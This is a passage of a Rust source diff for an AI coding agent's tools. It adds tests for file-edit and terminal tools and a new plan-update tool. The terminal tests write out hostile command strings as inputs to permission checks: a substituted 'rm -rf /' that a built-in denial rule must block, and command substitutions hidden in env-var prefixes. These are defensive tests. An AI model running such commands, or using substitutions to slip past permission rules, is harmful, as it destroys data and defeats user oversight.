"path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_final(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root/file.txt" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_final(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root/file.txt" + })); + cx.run_until_parked(); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { + let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + // Create a new file via the streaming edit file tool + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + let result = task.await; + assert!(result.is_ok(), "create should succeed: {:?}", result.err()); + cx.run_until_parked(); + + assert!( + fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should exist after creation" + ); + + // Reject all edits — this should delete the newly created file + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log should track the created file as changed" + ); + + action_log + .update(cx, |log, cx| log.reject_all_edits(None, cx)) + .await; + cx.run_until_parked(); + + assert!( + !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should be deleted after rejecting creation, but an empty file was left behind" + ); + } + async fn setup_test_with_fs( cx: &mut TestAppContext, fs: Arc, diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 6396bd1b0e63b46a0207dd7df9b9f2fcd00176b7..82bf9a06480bb7d6db3611516281f42452ec5137 100644 --- 
a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -29,6 +29,8 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Make sure you use the `cd` parameter to navigate to one of the root directories of the project. NEVER do it as part of the `command` itself, otherwise it will error. /// +/// Do not generate terminal commands that use shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`. Resolve those values yourself before calling this tool, or ask the user for the literal value to use. +/// /// Do not use this tool for commands that run indefinitely, such as servers (like `npm run start`, `npm run dev`, `python -m http.server`, etc) or file watchers that don't terminate on their own. /// /// For potentially long-running commands, prefer specifying `timeout_ms` to bound runtime and prevent indefinite hangs. @@ -39,7 +41,7 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { - /// The one-liner command to execute. + /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. 
pub cd: String, @@ -628,4 +630,824 @@ mod tests { result ); } + + #[gpui::test] + async fn test_run_rejects_invalid_substitution_before_terminal_creation( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.expect_err("expected invalid terminal command to be rejected"); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "expected explicit invalid-command message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for invalid commands" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "invalid command should not request authorization" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallUpdate( + acp_thread::ToolCallUpdate::UpdateFields(_) + )))) + ), + 
"invalid command should not emit a terminal card update" + ); + } + + #[gpui::test] + async fn test_run_allows_invalid_substitution_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update in unconditional allow-all mode" + ); + + let result = task + .await + .expect("command should proceed in unconditional allow-all mode"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected invalid-command rejection output: {result}" + ); + } + + #[gpui::test] + async fn 
test_run_hardcoded_denial_still_wins_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(rm -rf /)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("hardcoded denial should override unconditional allow-all"); + assert!( + error.contains("built-in security rule"), + "expected hardcoded denial message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "hardcoded denial should prevent terminal creation" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "hardcoded denial should not request authorization" + ); + } + + #[gpui::test] + async fn test_run_env_prefixed_allow_pattern_is_used_end_to_end(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = 
project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log --oneline".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update for matching env-prefixed allow rule" + ); + + let result = task + .await + .expect("expected env-prefixed command to be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for allowed env-prefixed command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn 
test_run_old_anchored_git_pattern_no_longer_auto_allows_env_prefix( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Confirm), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^git\b", false).unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let _task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let _auth = rx.expect_authorization().await; + assert!( + environment.terminal_creation_count() == 0, + "confirm flow should not create terminal before authorization" + ); + } + + #[test] + fn test_terminal_tool_description_mentions_forbidden_substitutions() { + let description = ::description().to_string(); + + assert!( + description.contains("$VAR"), + "missing $VAR example: {description}" + ); + assert!( + description.contains("${VAR}"), + "missing ${{VAR}} example: {description}" 
+ ); + assert!( + description.contains("$(...)"), + "missing $(...) example: {description}" + ); + assert!( + description.contains("backticks"), + "missing backticks example: {description}" + ); + assert!( + description.contains("$((...))"), + "missing $((...)) example: {description}" + ); + assert!( + description.contains("<(...)") && description.contains(">(...)"), + "missing process substitution examples: {description}" + ); + } + + #[test] + fn test_terminal_tool_input_schema_mentions_forbidden_substitutions() { + let schema = ::input_schema( + language_model::LanguageModelToolSchemaFormat::JsonSchema, + ); + let schema_json = serde_json::to_value(schema).expect("schema should serialize"); + let schema_text = schema_json.to_string(); + + assert!( + schema_text.contains("$VAR"), + "missing $VAR example: {schema_text}" + ); + assert!( + schema_text.contains("${VAR}"), + "missing ${{VAR}} example: {schema_text}" + ); + assert!( + schema_text.contains("$(...)"), + "missing $(...) example: {schema_text}" + ); + assert!( + schema_text.contains("backticks"), + "missing backticks example: {schema_text}" + ); + assert!( + schema_text.contains("$((...))"), + "missing $((...)) example: {schema_text}" + ); + assert!( + schema_text.contains("<(...)") && schema_text.contains(">(...)"), + "missing process substitution examples: {schema_text}" + ); + } + + async fn assert_rejected_before_terminal_creation( + command: &str, + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = 
settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: command.to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.unwrap_err(); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "command {command:?} should be rejected with substitution message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "no terminal should be created for rejected command {command:?}" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "rejected command {command:?} should not request authorization" + ); + } + + #[gpui::test] + async fn test_rejects_variable_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ${HOME}", cx).await; + } + + #[gpui::test] + async fn test_rejects_positional_parameter(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $1", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_question(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $?", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_dollar(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $$", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_at(cx: &mut 
gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $@", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_dollar_parens(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_backticks(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo `whoami`", cx).await; + } + + #[gpui::test] + async fn test_rejects_arithmetic_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $((1 + 1))", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_input(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("cat <(ls)", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_output(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("ls >(cat)", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_variable(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$HOME git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$(whoami) git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_brace_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation( + "GIT_SEQUENCE_EDITOR=${EDITOR} git rebase -i HEAD~2", + cx, + ) + .await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_on_second_line(cx: &mut gpui::TestAppContext) { + 
crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ok\necho $HOME", cx).await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_mixed(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=less git log\necho $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_nested_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(cat $(whoami).txt)", cx).await; + } + + #[gpui::test] + async fn test_allow_all_terminal_specific_default_with_empty_patterns( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(whoami)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + 
event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "terminal-specific allow-all should bypass substitution rejection" + ); + + let result = task + .await + .expect("terminal-specific allow-all should let the command proceed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_pattern_rejects_different_value(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, _rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + 
crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=other git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("different env-var value should not match allow pattern"); + assert!( + error.contains("could not be approved") + || error.contains("denied") + || error.contains("disabled"), + "expected denial for mismatched env value, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for non-matching env value" + ); + } + + #[gpui::test] + async fn test_env_prefix_multiple_assignments_preserved_in_order( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^A=1\s+B=2\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + 
crate::ToolInput::resolved(TerminalToolInput { + command: "A=1 B=2 git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "multi-assignment pattern should match and produce terminal content" + ); + + let result = task + .await + .expect("multi-assignment command matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching multi-assignment command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_quoted_whitespace_value_matches_only_with_quotes_in_pattern( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new( + r#"^PAGER="less\ -R"\s+git\s+log(\s|$)"#, + false, + ) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); 
+ + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=\"less -R\" git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "quoted whitespace value should match pattern with quoted form" + ); + + let result = task + .await + .expect("quoted whitespace env value matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching quoted-value command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } } diff --git a/crates/agent/src/tools/update_plan_tool.rs b/crates/agent/src/tools/update_plan_tool.rs new file mode 100644 index 0000000000000000000000000000000000000000..9fdc5a865dfb5cd2a18e3f24b3f7544b397588d3 --- /dev/null +++ b/crates/agent/src/tools/update_plan_tool.rs @@ -0,0 +1,290 @@ +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol as acp; +use gpui::{App, SharedString, Task}; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +#[serde(rename_all = "snake_case")] +#[schemars(inline)] +pub enum PlanEntryStatus { + /// The task has not started yet. + Pending, + /// The task is currently being worked on. + InProgress, + /// The task has been successfully completed. 
+ Completed, +} + +impl From for acp::PlanEntryStatus { + fn from(value: PlanEntryStatus) -> Self { + match value { + PlanEntryStatus::Pending => acp::PlanEntryStatus::Pending, + PlanEntryStatus::InProgress => acp::PlanEntryStatus::InProgress, + PlanEntryStatus::Completed => acp::PlanEntryStatus::Completed, + } + } +} + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq, Default)] +#[serde(rename_all = "snake_case")] +#[schemars(inline)] +pub enum PlanEntryPriority { + High, + #[default] + Medium, + Low, +} + +impl From for acp::PlanEntryPriority { + fn from(value: PlanEntryPriority) -> Self { + match value { + PlanEntryPriority::High => acp::PlanEntryPriority::High, + PlanEntryPriority::Medium => acp::PlanEntryPriority::Medium, + PlanEntryPriority::Low => acp::PlanEntryPriority::Low, + } + } +} + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct PlanItem { + /// Human-readable description of what this task aims to accomplish. + pub step: String, + /// The current status of this task. + pub status: PlanEntryStatus, + /// The relative importance of this task. Defaults to medium when omitted. + #[serde(default)] + pub priority: PlanEntryPriority, +} + +impl From for acp::PlanEntry { + fn from(value: PlanItem) -> Self { + acp::PlanEntry::new(value.step, value.priority.into(), value.status.into()) + } +} + +/// Updates the task plan. +/// Provide a list of plan entries, each with step, status, and optional priority. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct UpdatePlanToolInput { + /// The list of plan entries and their current statuses. 
+ pub plan: Vec, +} + +pub struct UpdatePlanTool; + +impl UpdatePlanTool { + fn to_plan(input: UpdatePlanToolInput) -> acp::Plan { + acp::Plan::new(input.plan.into_iter().map(Into::into).collect()) + } +} + +impl AgentTool for UpdatePlanTool { + type Input = UpdatePlanToolInput; + type Output = String; + + const NAME: &'static str = "update_plan"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Think + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + match input { + Ok(input) if input.plan.is_empty() => "Clear plan".into(), + Ok(_) | Err(_) => "Update plan".into(), + } + } + + fn run( + self: Arc, + input: ToolInput, + event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + event_stream.update_plan(Self::to_plan(input)); + + Ok("Plan updated".to_string()) + }) + } + + fn replay( + &self, + input: Self::Input, + _output: Self::Output, + event_stream: ToolCallEventStream, + _cx: &mut App, + ) -> anyhow::Result<()> { + event_stream.update_plan(Self::to_plan(input)); + Ok(()) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::ToolCallEventStream; + use gpui::TestAppContext; + use pretty_assertions::assert_eq; + + fn sample_input() -> UpdatePlanToolInput { + UpdatePlanToolInput { + plan: vec![ + PlanItem { + step: "Inspect the existing tool wiring".to_string(), + status: PlanEntryStatus::Completed, + priority: 